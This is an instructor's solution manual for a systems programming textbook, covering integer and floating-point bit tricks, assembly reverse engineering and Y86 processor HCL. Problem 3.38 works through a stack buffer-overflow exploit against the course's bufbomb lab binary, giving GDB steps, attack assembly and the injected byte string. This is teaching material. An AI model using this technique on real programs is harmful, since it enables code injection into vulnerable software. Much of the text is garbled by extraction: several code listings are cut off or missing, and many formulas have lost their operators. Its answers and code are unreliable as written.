# Computer Systems: A Programmer's Perspective \*Instructor's Solution Manual 1\*\*



Randal E. Bryant David R. O'Hallaron

December 4, 2003

<sup>&</sup>lt;sup>1</sup>Copyright © 2003, R. E. Bryant, D. R. O'Hallaron. All rights reserved.

# **Chapter 1**

# **Solutions to Homework Problems**

The text uses two different kinds of exercises:

- *Practice Problems*. These are problems that are incorporated directly into the text, with explanatory solutions at the end of each chapter. Our intention is that students will work on these problems as they read the book. Each one highlights some particular concept.
- *Homework Problems*. These are found at the end of each chapter. They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.

This document gives the solutions to the homework problems.

# 1.1 Chapter 1: A Tour of Computer Systems

# 1.2 Chapter 2: Representing and Manipulating Information

# **Problem 2.40 Solution:**

This exercise should be a straightforward variation on the existing code.

\_ code/data/show-ans.c

```
1 void show_short(short int x)
2 {
3          show_bytes((byte_pointer) &x, sizeof(short int));
4 }
5
6 void show_long(long int x)
7 {
8          show_bytes((byte_pointer) &x, sizeof(long));
9 }
```

\_\_ code/data/show-ans.c

#### **Problem 2.41 Solution:**

There are many ways to solve this problem. The basic idea is to create some multibyte datum with different values for the most and least-significant bytes. We then read byte 0 and determine which byte it is.

In the following solution is to create an int with value 1. We then access its first byte and convert it to an int. This byte will equal 0 on a big-endian machine and 1 on a little-endian machine.

\_\_\_\_\_code/data/show-ans.c

```
int is_little_endian(void)

{
    /* MSB = 0, LSB = 1 */
    int x = 1;

    /* Return MSB when big-endian, LSB when little-endian */
    return (int) (* (char *) &x);

}
```

\_\_ code/data/show-ans.c

#### **Problem 2.42 Solution:**

This is a simple exercise in masking and bit manipulation. It is important to mention that ~0xFF is a way to generate a mask that selects all but the least significant byte that works for any word size.

```
(x \& 0xFF) \mid (y \& ^0xFF)
```

#### **Problem 2.43 Solution:**

These exercises require thinking about the logical operation! in a nontraditional way. Normally we think of it as logical negation. More generally, it detects whether there is any nonzero bit in a word.

```
A. !!x
B. !!~x
C. !!(x & 0xFF)
D. !!(~x & 0xFF)
```

# **Problem 2.44 Solution:**

There are many solutions to this problem, but it is a little bit tricky to write one that works for any word size. Here is our solution:

\_\_\_\_\_code/data/shift-ans.c

```
1 int int_shifts_are_arithmetic()
2 {
3     int x = ~0; /* All 1's */
4
5     return (x >> 1) == x;
6 }
```

\_\_\_\_ code/data/shift-ans.c

The above code performs a right shift of a word in which all bits are set to 1. If the shift is arithmetic, the resulting word will still have all bits set to 1.

# **Problem 2.45 Solution:**

This problem illustrates some of the challenges of writing portable code. The fact that 1<<32 yields 0 on some 32-bit machines and 1 on others is common source of bugs.

- A. The C standard does not define the effect of a shift by 32 of a 32-bit datum. On the SPARC (and many other machines), the expression x << k shifts by  $k \mod 32$ , i.e., it ignores all but the least significant 5 bits of the shift amount. Thus, the expression 1 << 32 yields 1.
- B. Compute beyond\_msb as 2 << 31.
- C. We cannot shift by more than 15 bits at a time, but we can compose multiple shifts to get the desired effect. Thus, we can compute set\_msb as 2 << 15 << 15, and beyond\_msb as set\_msb << 1.

#### **Problem 2.46 Solution:**

This problem highlights the difference between zero extension and sign extension. It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.

- A. The function does not perform any sign extension. For example, if we attempt to extract byte 0 from word  $0 \times FF$ , we will get 255, rather than -1.
- B. The following code uses a well-known trick for using shifts to isolate a particular range of bits and to perform sign extension at the same time. First, we perform a left shift so that the most significant bit of the desired byte is at bit position 31. Then we right shift by 24, moving the byte into the proper position and performing sign extension at the same time.

\_\_\_\_\_ code/data/xbyte.c

```
1 int xbyte(packed_t word, int bytenum)
2 {
```

#### **Problem 2.47 Solution:**

| $\vec{x}$ |     | $\vec{x}$ |     | $incr(\vec{x})$ |     |
|-----------|-----|-----------|-----|-----------------|-----|
| [01101]   | 13  | [10010]   | -14 | [10011]         | -13 |
| [01111]   | 15  | [10000]   | -16 | [10001]         | -15 |
| [11000]   | -8  | [00111]   | 7   | [01000]         | 8   |
| [11111]   | -1  | [00000]   | 0   | [00001]         | 1   |
| [10000]   | -16 | [01111]   | 15  | [10000]         | -16 |

# **Problem 2.48 Solution:**

This problem lets students rework the proof that complement plus increment performs negation.

We make use of the property that two's complement addition is associative, commutative, and has additive inverses. Using C notation, if we define y to be x-1, then we have  $\ ^y+1$  equal to  $\ ^y+1$ , and hence  $\ ^y+1$ . Substituting gives the expression  $\ ^-(x-1)+1$ , which equals  $\ ^-x$ .

# **Problem 2.49 Solution:**

This problem requires a fairly deep understanding of two's complement arithmetic. Some machines only provide one form of multiplication, and hence the trick shown in the code here is actually required to perform that actual form.

As seen in Equation 2.16 we have  $x' \cdot y' = x \cdot y + (x_{w-1}y + y_{w-1}x)2^w + x_{w-1}y_{w-1}2^{2w}$ . The final term has no effect on the 2w-bit representation of  $x' \cdot y'$ , but the middle term represents a correction factor that must be added to the high order w bits. This is implemented as follows:

\_\_\_\_ code/data/uhp-ans.c

```
1 unsigned unsigned_high_prod(unsigned x, unsigned y)
2 {
3     unsigned p = (unsigned) signed_high_prod((int) x, (int) y);
4
5     if ((int) x < 0) /* x_{w-1} = 1 */
6         p += y;
7     if ((int) y < 0) /* y_{w-1} = 1 */
8         p += x;
9     return p;
10 }</pre>
```

\_ code/data/uhp-ans.c

# **Problem 2.50 Solution:**

Patterns of the kind shown here frequently appear in compiled code.

```
A. K = 5: x + (x << 2)

B. K = 9: x + (x << 3)

C. K = 14: (x << 4) - (x<<1)

D. K = -56: (x << 3) - (x << 6)
```

# **Problem 2.51 Solution:**

Bit patterns similar to these arise in many applications. Many programmers provide them directly in hexadecimal, but it would be better if they could express them in more abstract ways.

```
A. 1^{w-k}0^k.

((1 << k) - 1)

B. 0^{w-k-j}1^k0^j.

((1 << k) - 1) << j
```

# **Problem 2.52 Solution:**

Byte extraction and insertion code is useful in many contexts. Being able to write this sort of code is an important skill to foster.

\_\_\_\_\_ code/data/rbyte-ans.c

```
1 unsigned replace_byte (unsigned x, int i, unsigned char b)
2 {
3     int itimes8 = i << 3;
4     unsigned mask = 0xFF << itimes8;
5
6     return (x & ~mask) | (b << itimes8);
7 }</pre>
```

\_\_\_\_\_code/data/rbyte-ans.c

#### **Problem 2.53 Solution:**

These problems are fairly tricky. They require generating masks based on the shift amounts. Shift value k equal to 0 must be handled as a special case, since otherwise we would be generating the mask by performing a left shift by 32.

\_\_\_\_\_code/data/rshift-ans.c

```
1 unsigned srl(unsigned x, int k)
2 {
3     /* Perform shift arithmetically */
4     unsigned xsra = (int) x >> k;
5     /* Make mask of low order 32-k bits */
6     unsigned mask = k ? ((1 << (32-k)) - 1) : ~0;
7
8     return xsra & mask;
9 }</pre>
```

\_\_\_\_\_ code/data/rshift-ans.c

code/data/rshift-ans.c

```
1 int sra(int x, int k)
2 {
3     /* Perform shift logically */
4     int xsrl = (unsigned) x >> k;
5     /* Make mask of high order k bits */
6     unsigned mask = k ? ~((1 << (32-k)) - 1) : 0;
7
8     return (x < 0) ? mask | xsrl : xsrl;
9 }</pre>
```

\_\_\_\_\_ code/data/rshift-ans.c

# **Problem 2.54 Solution:**

These "C puzzle" problems are a great way to motivate students to think about the properties of computer arithmetic from a programmer's perspective. Our standard lecture on computer arithmetic starts by showing a set of C puzzles. We then go over the answers at the end.

```
A. (x < y) = (-x > -y). No, Let x = TMin_{32}, y = 0.
```

B. ((x+y) << 4) + y-x == 17\*y+15\*x. Yes, from the ring properties of two's complement arithmetic.

```
C. x+y = (x+y). No, x+y = (-x-1)+(-y-1) = -(x+y)-2 \neq -(x+y)-1 = (x+y).
```

- D. (int) (ux-uy) == -(y-x). Yes. Due to the isomorphism between two's complement and unsigned arithmetic.
- E. ((x >> 1) << 1) <= x. Yes. Right shift rounds toward minus infinity.

#### **Problem 2.55 Solution:**

This problem helps students think about fractional binary representations.

A. Letting V denote the value of the string, we can see that shifting the binary point k positions to the right gives a string y.yyyyy..., which has numeric value Y+V, and also value  $V\times 2^k$ . Equating these gives  $V=\frac{Y}{2^k-1}$ .

- B. (a) For y = 001, we have Y = 1, k = 3,  $V = \frac{1}{7}$ .
  - (b) For y = 1001, we have Y = 9, k = 4,  $V = \frac{9}{15} = \frac{3}{5}$ .
  - (c) For y = 000111, we have Y = 7, k = 6,  $V = \frac{7}{63} = \frac{1}{9}$ .

#### **Problem 2.56 Solution:**

This problem helps students appreciate the property of IEEE floating point that the relative magnitude of two numbers can be determined by viewing the combination of exponent and fraction as an unsigned integer. Only the signs and the handling of  $\pm 0$  requires special consideration.

\_\_\_\_\_code/data/floatge-ans.c

```
1 int float_ge(float x, float y)
      unsigned ux = f2u(x);
3
      unsigned uy = f2u(y);
4
      unsigned sx = ux >> 31;
      unsigned sy = uy >> 31;
8
      return
          (ux << 1 == 0 \&\& uy << 1 == 0) | /* Both are zero */
9
          (!sx \&\& sy) \mid | /*x >= 0, y < 0 */
10
          (!sx \&\& !sy \&\& ux >= uy) | | /* x >= 0, y >= 0 */
          (sx \&\& sy \&\& ux \le uy); /* x < 0, y < 0 */
12
13 }
```

\_\_ code/data/floatge-ans.c

# **Problem 2.57 Solution:**

Exercises such as this help students understand floating point representations, their precision, and their ranges.

- A. The number 5.0 will have E=2,  $M=1.01_2=\frac{5}{4}$ ,  $f=0.01_2=\frac{1}{4}$ , and V=5. The exponent bits will be  $100\cdots 01$  and the fraction bits will be  $0100\cdots 0$ .
- B. The largest odd integer that can be represented exactly will have a binary representation consisting of n+1 1s. It will have  $E=n, M=1.11\cdots 1_2=2-2^{-n}, f=0.11\cdots 1_2=1-2^{-n}$ , and a value  $V=2^{n+1}-1$ . The bit representation of the exponent will be the binary representation of  $n+2^{k-1}-1$ . The bit representation of the fraction will be  $11\cdots 11$ .
- C. The reciprocal of the smallest positive normalized value will have value  $V=2^{2^{k-1}-2}$ . It will have  $E=2^{k-1}-2$ , M=1, and f=0. The bit representation of the exponent will be  $11\cdots 100$ . The bit representation of the fraction will be  $00\cdots 00$ .

# **Problem 2.58 Solution:**

This exercise is of practical value, since Intel-compatible processors perform all of their arithmetic in extended precision. It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.

| Description      | Extended precision                |                          |  |
|------------------|-----------------------------------|--------------------------|--|
|                  | Value                             | Decimal                  |  |
| Smallest denorm. | $2^{-63} \times 2^{-16382}$       | $3.64 \times 10^{-4951}$ |  |
| Smallest norm.   | $2^{-16382}$                      | $3.36 \times 10^{-4932}$ |  |
| Largest norm.    | $(2 - \epsilon) \times 2^{16383}$ | $1.19 \times 10^{4932}$  |  |

# **Problem 2.59 Solution:**

We have found that working through floating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE floating point more concrete.

| Description                         | Hex  | M                 | E   | V                    |
|-------------------------------------|------|-------------------|-----|----------------------|
| -0                                  | 8000 | 0                 | -62 | -0                   |
| Smallest value > 1                  | 3F01 | $\frac{257}{256}$ | 0   | $\frac{257}{256}$    |
| 256                                 | 4700 | 1                 | 71  |                      |
| Largest denormalized                | 00FF | $\frac{255}{256}$ | -62 | $255 \times 2^{-70}$ |
| $-\infty$                           | FF00 | _                 | _   |                      |
| Number with hex representation 3AA0 | _    | $\frac{13}{8}$    | -5  | $\frac{13}{256}$     |

#### **Problem 2.60 Solution:**

This problem requires students to think of the relationship between int, float, and double.

- A. (double) (float) x = dx. No. Try  $x = TMax_{32}$ . Note that it is true with Linux/GCC, since it uses a extended precision representation for both double and float.
- B. dx + dy == (double) (y+x). No. Let  $x = y = TMin_{32}$ .
- C. dx + dy + dz == dz + dy + dx. Yes. Since each value ranges between  $TMin_{32}$  and  $TMax_{32}$ , their sum can be represented exactly.
- D. dx \* dy \* dz == dz \* dy \* dx. No. Let  $dx = TMax_{32}$ ,  $dy = TMax_{32} 1$ ,  $dz = TMax_{32} 2$ . (Not detected with Linux/gcc)
- E. dx / dx == dy / dy. No. Let x = 0, y = 1.

#### **Problem 2.61 Solution:**

```
1 /* Compute 2**x */
2 float fpwr2(int x) {
       unsigned exp, sig;
       unsigned u;
5
6
7
       if (x < -149) {
           /* Too small. Return 0.0 */
8
9
           exp = 0;
           sig = 0;
10
       } else if (x < -126) {
11
           /* Denormalized result */
12
           exp = 0;
13
           sig = 1 << (x + 149);
14
       } else if (x < 128) {
           /* Normalized result. */
16
           exp = x + 127;
17
           sig = 0;
18
       } else {
19
           /* Too big. Return +oo */
20
           \exp = 255i
21
           sig = 0;
22
23
       u = exp << 23 \mid sig;
24
      return u2f(u);
25
26 }
```

\_\_\_\_ code/data/fpwr2-ans.c

# **Problem 2.62 Solution:**

This problem requires students to work from a bit representation of a floating point number to its fractional binary representation.

```
A. \pi \approx 11.00100100001111111011011_2.
B. 22/7 = 11.001001001001001001001 \cdots_2.
```

C. They diverge in the ninth bit to the right of the binary point.

# 1.3 Chapter 3: Machine Level Representation of C Programs

# **Problem 3.31 Solution:**

This is an example of a problem that requires students to reverse engineer actions of the C compiler. We have found that reverse engineering is a good way to learn about both compilers and machine-level programs.

```
int decode2(int x, int y, int z)
{
    int t1 = y - z;
    int t2 = x * t1;
    int t3 = (t1 << 31) >> 31;
    int t4 = t3 ^ t2;

    return t4;
}
```

# **Problem 3.32 Solution:**

This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples. Seemingly insignificant changes in the C code can yield very different results. Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns. This problem encourages them to think in abstract terms about one such pattern.

The following is an annotated version of the assembly code:

- A. When x < y, it will compute first x y and then y x. When  $x \ge y$  it just computes x y.
- B. The code for *then-statement* gets executed unconditionally. It then jumps over the code for *else-statement* if the test is false.

C.

```
then-statement
t = test-expr;
if(t)
    goto done;
else-statement
done:
```

D. The code in *then-statement* must not have any side effects, other than to set variables that are also set in *else-statement*.

#### **Problem 3.33 Solution:**

This problem requires students to reason about the code fragments that implement the different branches of a switch statement. For this code, it also requires understanding different forms of pointer dereferencing.

- A. In line 29, register %edx is copied to register %eax as the return value. From this, we can infer that %edx holds result.
- B. The original C code for the function is as follows:

```
_{1} /* Enumerated type creates set of constants numbered 0 and upward */
2 typedef enum {MODE_A, MODE_B, MODE_C, MODE_D, MODE_E} mode_t;
4 int switch3(int *p1, int *p2, mode_t action)
5 {
6
    int result = 0;
7
    switch(action) {
   case MODE A:
9
     result = *p1;
      *p1 = *p2;
10
     break;
11
12 case MODE B:
    *p2 += *p1;
13
     result = *p2;
14
     break;
15
16
  case MODE_C:
     *p2 = 15;
17
      result = *p1;
18
     break;
20 case MODE_D:
     *p2 = *p1;
22
      /* Fall Through */
23 case MODE E:
     result = 17;
2.4
      break;
   default:
26
27
     result = -1;
28
29
    return result;
30 }
```

# **Problem 3.34 Solution:**

This problem gives students practice analyzing disassembled code. The switch statement contains all the features one can imagine—cases with multiple labels, holes in the range of possible case values, and cases that fall through.

\_\_\_\_\_\_code/asm/switchbody-ans.c

```
1 int switch_prob(int x)
2 {
       int result = x;
3
       switch(x) {
5
       case 50:
6
7
       case 52:
           result <<= 2;
8
9
           break;
       case 53:
10
           result >>= 2;
11
           break;
12
       case 54:
13
           result *= 3;
14
15
           /* Fall through */
       case 55:
16
17
           result *= result;
           /* Fall through */
18
19
       default:
           result += 10;
20
21
22
       return result;
23
24 }
```

\_\_\_\_\_ code/asm/switchbody-ans.c

# **Problem 3.35 Solution:**

This example illustrates a case where the compiler was clever, but humans can be more clever. Such cases are not unusual, and it is important for students to realize that compilers do not always generate optimal code.

In the following, we have merged variables B and nTjPk into a single pointer Bptr. This pointer gets incremented by n (which the compiler scales by 4) on every iteration.

\_\_\_\_\_ code/asm/varprod-ans.c

```
1 int var_prod_ele_opt (var_matrix A, var_matrix B, int i, int k, int n)
2 {
       int *Aptr = &A[i*n];
3
4
       int *Bptr = &B[k];
5
       int result = 0;
       int cnt = n;
6
       if (n \ll 0)
8
           return result;
9
10
       do {
11
           result += (*Aptr) * (*Bptr);
12
           Aptr += 1;
13
           Bptr += n;
14
           cnt--;
15
```

# **Problem 3.36 Solution:**

This problem requires using a variety of skills to determine parameters of the structure. One tricky part is that the values are not computed in the same order in the object code as they are in the assembly code.

The analysis requires understanding data structure layouts, pointers, address computations, and performing arithmetic computations using shifts and adds. Problems such as this one make good exercises for in-class discussion, such as during a recitation period. Try to convince students that these are "brain teasers." The answer can only be determined by assembling a number of different clues.

Here is a sequence of steps that leads to the answer:

- 1. Lines 5 to 8 compute the value of ap as  $x_{bp} + 20i + 4$ , where  $x_{bp}$  is the value of pointer bp. From this we can infer that structure a\_struct must have a 20-byte allocation.
- 2. Line 11 computes the expression bp->right using a displacement of 184 (0xb8). That means array a spans from bytes 4 to 184 of b\_struct, implying that CNT is (184 4)/20 = 9.
- 3. Line 9 appears to dereference ap. Actually, it is computing ap->idx, since field idx is at the beginning of structure a\_struct.
- 4. Line 10 scales ap->idx by 4, and line 13 stores n at an address computed by adding this scaled value, ap, and 4. From this we conclude that field x denotes an array of integers that follow right after field idx.

This analysis leads us to the following answers:

```
A. CNT is 9.

B. _______ code/asm/structprob-ans.c

1 typedef struct {
2    int idx;
3    int x[4];
4 } a_struct;

______ code/asm/structprob-ans.c
```

#### **Problem 3.37 Solution:**

This problem gets students in the habit of writing reliable code. As a general principle, code should not be vulnerable to conditions over which it has no control, such as the length of an input line. The following implementation uses the library function fgets to read up to BUFSIZE characters at a time.

```
1 /* Read input line and write it back */
2 /* Code will work for any buffer size. Bigger is more time-efficient */
3 #define BUFSIZE 64
4 void good_echo()
5 {
      char buf[BUFSIZE];
6
      int i;
7
      while (1) {
8
9
           if (!fgets(buf, BUFSIZE, stdin))
               return; /* End of file or error */
10
           /* Print characters in buffer */
11
           for (i = 0; buf[i] && buf[i] != ' n'; i++)
12
               if (putchar(buf[i]) == EOF)
13
                   return; /* Error */
14
15
           if (buf[i] == '\n')
              /* Reached terminating newline */
16
               putchar('\n');
17
1 2
               return;
           }
19
       }
20
21 }
```

An alternative implementation is to use getchar to read the characters one at a time.

# **Problem 3.38 Solution:**

Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level programs. It is quite intriguing that by supplying a string to one function, we can alter the behavior of another function that should always return a fixed value. In assigning this problem, you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.

Our solution starts by disassembling bufbomb, giving the following code for getbuf:

```
1 080484f4 <getbuf>:
2
  80484f4: 55
                                     push
                                            %ebp
  80484f5: 89 e5
                                            %esp,%ebp
3
                                     mov
   80484f7: 83 ec 18
                                     sub
                                            $0x18,%esp
   80484fa: 83 c4 f4
                                     add
                                            $0xffffffff4,%esp
5
  80484fd: 8d 45 f4
                                     lea
                                            0xffffffff(%ebp),%eax
  8048500: 50
                                     push
                                            %eax
   8048501: e8 6a ff ff ff
                                            8048470 <getxs>
8
                                     call
9 8048506: b8 01 00 00 00
                                            $0x1, %eax
                                     mov
10 804850b: 89 ec
                                            %ebp,%esp
                                     mov
11 804850d: 5d
                                            %ebp
                                     pop
12
   804850e:
             с3
                                     ret
13 804850f: 90
                                     nop
```

We can see on line 6 that the address of buf is 12 bytes below the saved value of %ebp, which is 4 bytes below the return address. Our strategy then is to push a string that contains 12 bytes of code, the saved value

of %ebp, and the address of the start of the buffer. To determine the relevant values, we run GDB as follows:

1. First, we set a breakpoint in getbuf and run the program to that point:

```
(gdb) break getbuf (gdb) run
```

Comparing the stopping point to the disassembly, we see that it has already set up the stack frame.

2. We get the value of buf by computing a value relative to %ebp:

```
(gdb) print /x (%ebp + 12)
```

This gives 0xbfffefbc.

3. We find the saved value of register %ebp by dereferencing the current value of this register:

```
(gdb) print /x *$ebp
```

This gives 0xbfffefe8.

4. We find the value of the return pointer on the stack, at offset 4 relative to %ebp:

```
(gdb) print /x *((int *)$ebp+1)
```

This gives 0x8048528

We can now put this information together to generate assembly code for our attack:

```
pushl $ 0x8048528

movl $0xdeadbeef, %eax

Alter return value

ret

Re-execute return

long 0xbfffefbe

long 0xbfffefbe

long 0x00000000

Padding
```

Note that we have used the .align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code. We added an extra 4 bytes of 0s at the end, because in some cases OBJDUMP would not generate the complete byte pattern for the data. These extra bytes (plus the termininating null byte) will overflow into the stack frame for test, but they will not affect the program behavior.

Assembling this code and disassembling the object code gives us the following:

| 1 | 0:  | 68 28 85 04 08 | push  | \$0x8048528                                |
|---|-----|----------------|-------|--------------------------------------------|
| 2 | 5:  | b8 ef be ad de | mov   | <pre>\$0xdeadbeef, %eax</pre>              |
| 3 | a:  | c3             | ret   |                                            |
| 4 | b:  | 90             | nop   | Byte inserted for alignment.               |
| 5 | c:  | e8 ef ff bf bc | call  | 0xbcc00000 Invalid disassembly.            |
| 6 | 11: | ef             | out   | <pre>%eax,(%dx) Trying to diassemble</pre> |
| 7 | 12: | ff             | (bad) | data                                       |
| 8 | 13: | bf 00 00 00 00 | mov   | \$0x0,%edi                                 |

From this we can read off the byte sequence:

```
68 28 85 04 08 b8 ef be ad de c3 90 e8 ef ff bf bc ef ff bf 00 00 00 00
```

# **Problem 3.39 Solution:**

This problem is a variant on the asm examples in the text. The code is actually fairly simple. It relies on the fact that asm outputs can be arbitrary lvalues, and hence we can use dest[0] and dest[1] directly in the output list.

\_\_\_\_\_code/asm/asmprobs-ans.c

\_\_\_\_\_ code/asm/asmprobs-ans.c

# **Problem 3.40 Solution:**

For this example, students essentially have to write the entire function in assembly. There is no (apparent) way to interface between the floating point registers and the C code using extended asm.

\_\_\_\_\_code/asm/fscale.c

```
1 /* Compute x * 2^n. Relies on known stack positions for arguments */
2 void scale(double x, int n, double *dest)
3 {
    /* Insert the following assembly code sequence:
       fildl 16(%ebp) # Convert n to floating point and push
5
       fldl 8(%ebp) # Push x
       fscale
                        # Compute x * 2^n
7
       movl 20(%ebp) # Get dest
9
       fstpl (%eax)
                        # Store result at *dest
    * /
10
     asm("fild1 16(%%ebp); fld1 8(%%ebp); fscale; mov1 20(%%ebp),%%eax;
11
         fstpl (%%eax); fstp %%st(0)"
12
        ::: "%eax");
13
14
15 }
```

\_\_\_\_\_code/asm/fscale.

17

# 1.4 Chapter 4: Processor Architecture

# **Problem 4.32 Solution:**

This problem makes students carefully examine the tables showing the computation stages for the different instructions. The steps for iaddl are a hybrid of those for irmovl and OPl.

| Stage      | iaddl V, rB                     |
|------------|---------------------------------|
| Fetch      | icode:ifun $\leftarrow M_1[PC]$ |
|            | $rA: rB \leftarrow M_1[PC + 1]$ |
|            | $valC \leftarrow M_4[PC + 2]$   |
|            | $valP \; \leftarrow \; PC + 6$  |
| Decode     |                                 |
|            | valB ← R[rB]                    |
| Execute    | valE ← valB + valC              |
|            |                                 |
| Memory     |                                 |
| Write back | R[rB] ← valE                    |
|            |                                 |
| PC update  | PC ← valP                       |

# **Problem 4.33 Solution:**

The leave instruction is fairly obscure, but working through its implementation makes it easier to undertand the implementation of the popl instruction, one of the trickiest of the Y86 instructions.

| Stage      | leave                               |  |
|------------|-------------------------------------|--|
| Fetch      | $  icode:ifun \leftarrow M_1[PC]  $ |  |
|            |                                     |  |
|            |                                     |  |
|            | $valP \; \leftarrow \; PC + 1$      |  |
| Decode     | valA ← R[%ebp]                      |  |
|            | valB ← R[%ebp]                      |  |
| Execute    | $valE \leftarrow valB + 4$          |  |
|            |                                     |  |
| Memory     | $valM \leftarrow M_4[valA]$         |  |
| Write back | R[%esp] ← valE                      |  |
|            | R[%ebp] ← valM                      |  |
| PC update  | PC ← valP                           |  |

# **Problem 4.34 Solution:**

The following HCL code includes implementations of both the iaddl instruction and the leave instructions. The implementations are fairly straightforward given the computation steps listed in the solutions to problems 4.32 and 4.33. You can test the solutions using the test code in the ptest subdirectory. Make sure you use command line argument '-i.'

\_\_\_\_\_ code/arch/seq-full-ans.hcl

```
2 # HCL Description of Control for Single Cycle Y86 Processor SEQ
3 # Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
6 ## This is the solution for the iaddl and leave problems
C Include's. Don't alter these
12 quote '#include <stdio.h>'
13 quote '#include "isa.h"'
14 quote '#include "sim.h"'
15 quote 'int sim_main(int argc, char *argv[]);'
16 quote 'int gen_pc(){return 0;}'
17 quote 'int main(int argc, char *argv[])'
18 quote ' {plusmode=0;return sim_main(argc,argv);}'
Declarations. Do not change/remove/delete any of these
24 ##### Symbolic representation of Y86 Instruction Codes ##############
25 intsig INOP
            'I NOP'
26 intsig IHALT
             'I_HALT'
27 intsig IRRMOVL 'I_RRMOVL'
28 intsig IIRMOVL 'I IRMOVL'
29 intsig IRMMOVL 'I RMMOVL'
30 intsig IMRMOVL 'I MRMOVL'
31 intsig IOPL
             'I ALU'
32 intsig IJXX
            'I_JMP'
33 intsig ICALL
             'I CALL'
34 intsig IRET
            'I RET'
35 intsig IPUSHL 'I_PUSHL'
            'I_POPL'
36 intsig IPOPL
37 # Instruction code for iaddl instruction
38 intsig IIADDL 'I_IADDL'
39 # Instruction code for leave instruction
40 intsig ILEAVE 'I LEAVE'
41
42 ##### Symbolic representation of Y86 Registers referenced explicitly #####
43 intsig RESP 'REG_ESP' # Stack Pointer
44 intsig REBP
             'REG EBP'
                        # Frame Pointer
45 intsig RNONE 'REG NONE'
                        # Special value indicating "no register"
47 ##### ALU Functions referenced explicitly
                                                    #####
48 intsig ALUADD 'A_ADD' # ALU should add its arguments
```

```
51
52 ##### Fetch stage inputs
                                   #####
                                  # Program counter
53 intsig pc 'pc'
54 ##### Fetch stage computations
                                  #####
55 intsig icode 'icode'
                                  # Instruction control code
56 intsig ifun
               'ifun'
                                  # Instruction function
57 intsig rA
               'ra'
                                  # rA field from instruction
              'rb'
                                  # rB field from instruction
58 intsig rB
59 intsig valC
              'valc'
                                  # Constant from instruction
60 intsig valP 'valp'
                                  # Address of following instruction
61
62 ##### Decode stage computations
                                  #####
63 intsig valA 'vala'
                                   # Value from register A port
64 intsig valB
               'valb'
                                  # Value from register B port
65
66 ##### Execute stage computations
                                  #####
67 intsig valE 'vale'
                                   # Value computed by ALU
68 boolsig Bch
              'bcond'
                                  # Branch test
70 ##### Memory stage computations
                                  #####
71 intsig valM 'valm'
                                   # Value read from memory
72
75 # Control Signal Definitions.
79
80 # Does fetched instruction require a regid byte?
81 bool need_regids =
        icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
83
                    IIADDL,
                    IIRMOVL, IRMMOVL, IMRMOVL };
84
85
86 # Does fetched instruction require a constant word?
87 bool need_valC =
         icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL, IIADDL };
89
90 bool instr valid = icode in
91
        { INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
92
              IIADDL, ILEAVE,
              IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL };
93
97 ## What register should be used as the A source?
98 int srcA = [
        icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : rA;
        icode in { ILEAVE } : REBP;
100
```

```
icode in { IPOPL, IRET } : RESP;
           1 : RNONE; # Don't need register
103];
105 ## What register should be used as the B source?
106 int srcB = [
           icode in { IOPL, IRMMOVL, IMRMOVL } : rB;
107
           icode in { IIADDL } : rB;
108
           icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
109
           icode in { ILEAVE } : REBP;
110
           1 : RNONE; # Don't need register
111
112 l;
113
114 ## What register should be used as the E destination?
115 int dstE = [
           icode in { IRRMOVL, IIRMOVL, IOPL} : rB;
           icode in { IIADDL } : rB;
117
           icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
118
           icode in { ILEAVE } : RESP;
           1 : RNONE; # Don't need register
120
121 ];
122
123 ## What register should be used as the M destination?
124 int dstM = [
           icode in { IMRMOVL, IPOPL } : rA;
125
           icode in { ILEAVE } : REBP;
126
          1 : RNONE; # Don't need register
127
128 ];
129
132 ## Select input A to ALU
133 int aluA = [
          icode in { IRRMOVL, IOPL } : valA;
           icode in { IIRMOVL, IRMMOVL, IMRMOVL } : valC;
           icode in { IIADDL } : valC;
           icode in { ICALL, IPUSHL } : -4;
137
          icode in { IRET, IPOPL } : 4;
          icode in { ILEAVE } : 4;
139
           # Other instructions don't need ALU
140
141 ];
142
143 ## Select input B to ALU
144 int aluB = [
           icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
145
                        IPUSHL, IRET, IPOPL } : valB;
146
           icode in { IIADDL, ILEAVE } : valB;
147
           icode in { IRRMOVL, IIRMOVL } : 0;
148
           # Other instructions don't need ALU
149
150 l;
```

```
151
152 ## Set the ALU function
153 int alufun = [
         icode == IOPL : ifun;
          1 : ALUADD;
155
156 ];
157
158 ## Should the condition codes be updated?
159 bool set_cc = icode in { IOPL, IIADDL };
162
163 ## Set read control signal
164 bool mem_read = icode in { IMRMOVL, IPOPL, IRET, ILEAVE };
166 ## Set write control signal
167 bool mem write = icode in { IRMMOVL, IPUSHL, ICALL };
168
169 ## Select memory address
170 int mem_addr = [
          icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : valE;
          icode in { IPOPL, IRET } : valA;
172
          icode in { ILEAVE } : valA;
          # Other instructions don't need address
174
175 ];
176
177 ## Select memory input data
178 int mem data = [
          # Value from register
179
          icode in { IRMMOVL, IPUSHL } : valA;
180
181
          # Return PC
          icode == ICALL : valP;
182
          # Default: Don't write anything
183
184 ];
185
188 ## What address should instruction be fetched at
189
190 int new_pc = [
191
          # Call. Use instruction constant
          icode == ICALL : valC;
192
          # Taken branch. Use instruction constant
193
          icode == IJXX && Bch : valC;
194
         # Completion of RET instruction. Use value from stack
195
         icode == IRET : valM;
196
197
          # Default: Use incremented PC
198
          1 : valP;
199 ];
```



Figure 1.1: **Pipeline states for special control conditions.** The pairs connected by arrows can arise simultaneously.

\_\_\_\_\_ code/arch/seq-full-ans.hcl

# **Problem 4.35 Solution:**

